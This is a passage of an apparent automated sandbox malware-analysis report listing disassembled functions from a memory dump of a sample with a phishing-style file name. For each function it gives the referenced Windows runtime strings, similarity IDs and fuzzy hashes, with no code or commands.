                                                • Opcode Fuzzy Hash: 92ab81fc0ff4917f6fcf8862cef5c31ee8d7a69a0aea18994f621c0118d08fd6
                                                • Instruction Fuzzy Hash: 0051E7B5A00227BFDF11DF9C989097EFBF8BB48244B54852AF565DB641D334DE408BA0
                                                Function 015B2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 0aa2953875b10f131aecee28de897bede1b1395165c57cb95985bc963ba87fe1
                                                • Instruction ID: 4286f0acb5ac12195842e91bb92dd85f17f3ef9f8fa77b357edcebb5960e44c5
                                                • Opcode Fuzzy Hash: 0aa2953875b10f131aecee28de897bede1b1395165c57cb95985bc963ba87fe1
                                                • Instruction Fuzzy Hash: 7751E471A00646AECB24DE5DC8D09BFBBF8FB44200F14885AE596DF681E678FA40C770
                                                Function 01537630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                Download Yara Rule
                                                Strings
                                                • Execute=1, xrefs: 01574713
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 015746FC
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01574742
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01574787
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01574725
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01574655
                                                • ExecuteOptions, xrefs: 015746A0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 0-484625025
                                                • Opcode ID: 4d96450edfe7a470b4d12b74488c5e09af0dc059fdfe4a27be59a75765241961
                                                • Instruction ID: 381019c120061ed26f93a778e1706de2afe14c3886f87e087baeb4ecfe1797c8
                                                • Opcode Fuzzy Hash: 4d96450edfe7a470b4d12b74488c5e09af0dc059fdfe4a27be59a75765241961
                                                • Instruction Fuzzy Hash: 2C5159B1A4021A7BEF11AAA8EC99FAD77A8FF9C300F14009DD605AF190D7709A41CF50
                                                Function 015D6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                • Instruction ID: d7b71a65fb28126cdd89d620da9a15371bc7ec681db1d7000c8d18ff59ea0965
                                                • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                • Instruction Fuzzy Hash: 7E02E171508342AFD325DF2CC490A6EBBE5FFC8704F44892DBA998B264DB31E945CB52
                                                Function 0154B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-$0$0
                                                • API String ID: 1302938615-699404926
                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                • Instruction ID: 2dc06df863816bbfefc17b52885fc03986d940efc79c24fd4ae73c13c6d1eba8
                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                • Instruction Fuzzy Hash: 5F81AD70E0524A9FEF29CF6CC8917FEBBB2BF45328F184619D861AF291C634D9418B51
                                                Function 015B20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$[$]:%u
                                                • API String ID: 48624451-2819853543
                                                • Opcode ID: ad19df50108373c5ce5fdfbbb5321be884f110daa7f7cc1623e6894b5d45c867
                                                • Instruction ID: 170edd7e483fd7f97bd5215496abd21076c7046be711dd393a62c29114c9b791
                                                • Opcode Fuzzy Hash: ad19df50108373c5ce5fdfbbb5321be884f110daa7f7cc1623e6894b5d45c867
                                                • Instruction Fuzzy Hash: F521357AA0011AABDB11DF79DC90AEEBBF8FF54654F44011AEA15D7240E730E9068BA1
                                                Function 0152F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                Download Yara Rule
                                                Strings
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015702BD
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015702E7
                                                • RTL: Re-Waiting, xrefs: 0157031E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                • API String ID: 0-2474120054
                                                • Opcode ID: 2adf35cdfe944615e772cba588bdc3bf995b45e1ca01953b1787748144555a0e
                                                • Instruction ID: 1c0d1c57090e5e37ae84fff3a9638f860d130f36efb02a0d91e828a36c106165
                                                • Opcode Fuzzy Hash: 2adf35cdfe944615e772cba588bdc3bf995b45e1ca01953b1787748144555a0e
                                                • Instruction Fuzzy Hash: 6AE1AC326047529FD725CF28E885B2ABBF0BB86714F140A1EF5A58F2E1D774E845CB42
                                                Function 0153B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                Download Yara Rule
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0157728C
                                                Strings
                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01577294
                                                • RTL: Resource at %p, xrefs: 015772A3
                                                • RTL: Re-Waiting, xrefs: 015772C1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-605551621
                                                • Opcode ID: cc455f23ba39d96eb29087d19a753dfb024e920d33a994961073b3b1986eaf7c
                                                • Instruction ID: f05685a77d969a986725500aced0e60a993ed1aa77d1db3e74616d197eef6246
                                                • Opcode Fuzzy Hash: cc455f23ba39d96eb29087d19a753dfb024e920d33a994961073b3b1986eaf7c
                                                • Instruction Fuzzy Hash: 8241D231700203ABDB21DE29EC46F6AB7E5FB98715F100A19F965EF240DB31E85287E1
                                                Function 015B2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: 9dfb0b19505b69eaf0612c8e21290e9fbbf252fb91581cf798ffad894159cbde
                                                • Instruction ID: f9d959fcba4f3aa4ebc6e93207f7e8a2975b8bf2bbf886ab0330d9f6d2915bc3
                                                • Opcode Fuzzy Hash: 9dfb0b19505b69eaf0612c8e21290e9fbbf252fb91581cf798ffad894159cbde
                                                • Instruction Fuzzy Hash: 1D316172A016199FDB60DF2DCC80BEEB7F8FB54610F54455AE949E7240EB30AA458BB0
                                                Function 01509126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$@
                                                • API String ID: 0-1194432280
                                                • Opcode ID: 31c3c65fa9942e252c165572b52be184c6a15ea05ca707ecebc343e13c9b6805
                                                • Instruction ID: 606dc83c29c6440f42b2ec85adfd14d26c78edc35c92e940ed71388a021889b6
                                                • Opcode Fuzzy Hash: 31c3c65fa9942e252c165572b52be184c6a15ea05ca707ecebc343e13c9b6805
                                                • Instruction Fuzzy Hash: FC810D71D0166A9BDB369B54CC44BEEB6B8BB48754F0041DAEA1DBB280D7705E84CFA0